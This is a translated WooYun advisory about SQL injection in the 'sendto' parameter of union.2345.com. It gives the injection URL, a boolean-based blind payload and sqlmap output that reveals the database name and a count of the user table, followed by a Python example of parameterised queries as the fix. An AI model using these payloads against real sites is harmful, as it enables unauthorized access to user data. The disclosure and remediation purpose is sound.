神刀安全网

Vulnerability title: SQL injection on a 2345 subsite

Vulnerability details

Disclosure status:

2016-01-27: Details sent to the vendor; awaiting the vendor's response
2016-01-27: Vendor has confirmed; details disclosed to the vendor only
2016-02-06: Details disclosed to core white hats and experts in the relevant field
2016-02-16: Details disclosed to regular white hats
2016-02-26: Details disclosed to intern white hats
2016-03-10: Details disclosed to the public

Brief description:

SQL injection on a 2345 subsite

Detailed description:

2345 Union (2345大联盟), union.2345.com

Injection point

http://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271

Parameter: sendto

MySQL string-type (quoted literal) injection

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET

Parameter: sendto

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU

[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:17:55] [INFO] testing MySQL

[13:17:55] [INFO] confirming MySQL

[13:17:55] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:17:55] [INFO] fetching current database

[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:17:55] [INFO] retrieved:

[13:17:55] [WARNING] reflective value(s) found and filtering out

union2345

current database: 'union2345'

Impact: affects the union's registered users and involves the security of users' funds.

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select count(*) from all_user

[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'

[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:25:38] [INFO] retrieved:

[13:25:38] [WARNING] reflective value(s) found and filtering out

4513

select count(*) from all_user: '4513'

sql-shell>

Fix recommendation:

Filter the input.
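The advisory describes a quoted-literal (string-type) injection in the sendto parameter and recommends filtering. The following is an added example, not code from the advisory or from 2345's site, that shows the defect class and its standard remediation side by side: the vulnerable pattern concatenates the parameter into a quoted SQL literal, while the hardened version allow-list validates sendto as a decimal integer and then binds it with a parameterised statement. SQLite stands in for MySQL so the example runs offline; the table mall_item, its columns and its rows are constructed for the demonstration and are not the site's real schema. (With a MySQL driver such as mysqlclient or PyMySQL the placeholder syntax is %s instead of ?.)

```python
import sqlite3


def make_db():
    """Build an in-memory catalogue (constructed sample data, not 2345's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mall_item (id INTEGER PRIMARY KEY, name TEXT, sendto INTEGER)"
    )
    conn.executemany(
        "INSERT INTO mall_item (name, sendto) VALUES (?, ?)",
        [("gift card", 1), ("mug", 1), ("t-shirt", 2)],
    )
    conn.commit()
    return conn


def vulnerable_query(conn, sendto):
    """The defect class from the advisory: user input spliced into a quoted literal.

    A boolean expression appended inside the quotes changes the WHERE clause,
    which is exactly the oracle a boolean-based blind technique relies on.
    """
    sql = "SELECT name FROM mall_item WHERE sendto = '%s'" % sendto
    return [row[0] for row in conn.execute(sql)]


def hardened_query(conn, sendto):
    """Remediation: allow-list validation plus a parameterised statement.

    sendto is a numeric identifier, so anything that is not a plain decimal
    integer is refused before it reaches the database. The surviving value is
    passed as a bound parameter, so it can never alter the SQL text.
    """
    if not isinstance(sendto, str) or not sendto.isdigit():
        raise ValueError("sendto must be a decimal integer")
    sql = "SELECT name FROM mall_item WHERE sendto = ?"
    return [row[0] for row in conn.execute(sql, (int(sendto),))]


def hardened_rejects(conn, sendto):
    """True when hardened_query refuses the value; used to check the allow-list."""
    try:
        hardened_query(conn, sendto)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # The advisory's payload shape, reduced to its boolean tail; under the
    # vulnerable query the result set flips with the truth of the appended test.
    true_tail = "1' and '1'='1"
    false_tail = "1' and '1'='2"
    print("vulnerable, benign   :", vulnerable_query(db, "1"))
    print("vulnerable, true tail:", vulnerable_query(db, true_tail))
    print("vulnerable, false tail:", vulnerable_query(db, false_tail))
    print("hardened, benign     :", hardened_query(db, "1"))
    print("hardened rejects tail:", hardened_rejects(db, true_tail))
```

The contrast worth noticing is that the vulnerable function returns different rows for the two tails even though both start with the same valid id, which is the signal sqlmap's boolean-based blind test looks for; the hardened function returns the same rows for a legitimate id and refuses both tails outright, so there is no oracle left to observe. Parameter binding alone would also be sufficient here, since the bound value is never parsed as SQL; the integer allow-list is an additional layer that matches the advisory's "filter" recommendation and also produces a clean, loggable rejection for anything that is not an id.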

Copyright notice: please credit the source when reposting: greg.wu@乌云 (WooYun)
